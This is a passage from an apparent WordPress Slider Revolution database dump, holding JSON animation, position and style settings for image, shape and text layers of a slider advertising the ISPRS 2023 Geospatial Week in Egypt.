To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"33\":{\"text\":\"Image 7\",\"alias\":\"Logo\",\"uid\":33,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/logo-slider-landing.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"161px\",\"e\":true},\"n\":{\"v\":\"161px\"},\"t\":{\"v\":\"161px\"},\"m\":{\"v\":\"161px\"}},\"height\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"159px\"},\"t\":{\"v\":\"159px\"},\"m\":{\"v\":\"159px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-133px\",\"e\":true},\"n\":{\"v\":\"-133px\"},\"t\":{\"v\":\"-133px\"},\"m\":{\"v\":\"-133px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":22,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":22,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"34\":{\"text\":\"Image 7\",\"alias\":\"Number\",\"uid\":34,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/number.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"21px\",\"e\":true},\"n\":{\"v\":\"21px\"},\"t\":{\"v\":\"21px\"},\"m\":{\"v\":\"21px\"}},\"height\":{\"d\":{\"v\":\"31px\",\"e\":true},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"31px\"},\"m\":{\"v\":\"31px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-83px\",\"e\":true},\"n\":{\"v\":\"-83px\"},\"t\":{\"v\":\"-83px\"},\"m\":{\"v\":\"-83px\"}},\"y\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"185px\"},\"t\":{\"v\":\"185px\"},\"m\":{\"v\":\"185px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":23,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":23,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"20\":{\"text\":\" \",\"alias\":\"Overlay-gradient\",\"uid\":20,\"size\":{\"width\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"height\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\"},\"t\":{\"v\":\"1200px\",\"e\":true},\"m\":{\"v\":\"1300px\",\"e\":true}},\"covermode\":\"fullwidth\",\"originalWidth\":\"100%\",\"originalHeight\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-1100px\",\"e\":true},\"n\":{\"v\":\"-1100px\"},\"t\":{\"v\":\"-1200px\",\"e\":true},\"m\":{\"v\":\"-1300px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":24,\"position\":\"absolute\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":24,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8680,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"15\"},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"customCSS\":\"background:linear-gradient(-0deg, rgba(0,0,0,1)45%, rgba(0,0,0,0));\\n\",\"type\":\"shape\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),
(4,4,2,'{\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#111111\",\"image\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/AAST-e1664974838122.jpg\",\"imageId\":2289,\"imageLib\":\"medialibrary\",\"mediaFilter\":\"slumber\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\"},\"imageWidth\":1772,\"imageHeight\":522,\"imageRatio\":3.3946360153256707},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\",\"adpr\":false},\"version\":\"6.6.0\"}','{\"1\":{\"text\":\"The ISPRS 2023 Geospatial Week\\n(Egypt GSW\'2023)\",\"alias\":\"text-1\",\"uid\":1,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"891.938px\",\"e\":true},\"n\":{\"v\":\"810px\"},\"t\":{\"v\":\"729px\"},\"m\":{\"v\":\"648px\"}},\"height\":{\"d\":{\"e\":true}},\"maxWidth\":{\"d\":{\"e\":true}},\"maxHeight\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"97px\",\"e\":true},\"n\":{\"v\":\"88px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"70px\"}},\"y\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"65px\"},\"t\":{\"v\":\"58px\"},\"m\":{\"v\":\"51px\"}},\"zIndex\":12,\"position\":\"absolute\"},\"group\":{\"groupOrder\":12},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0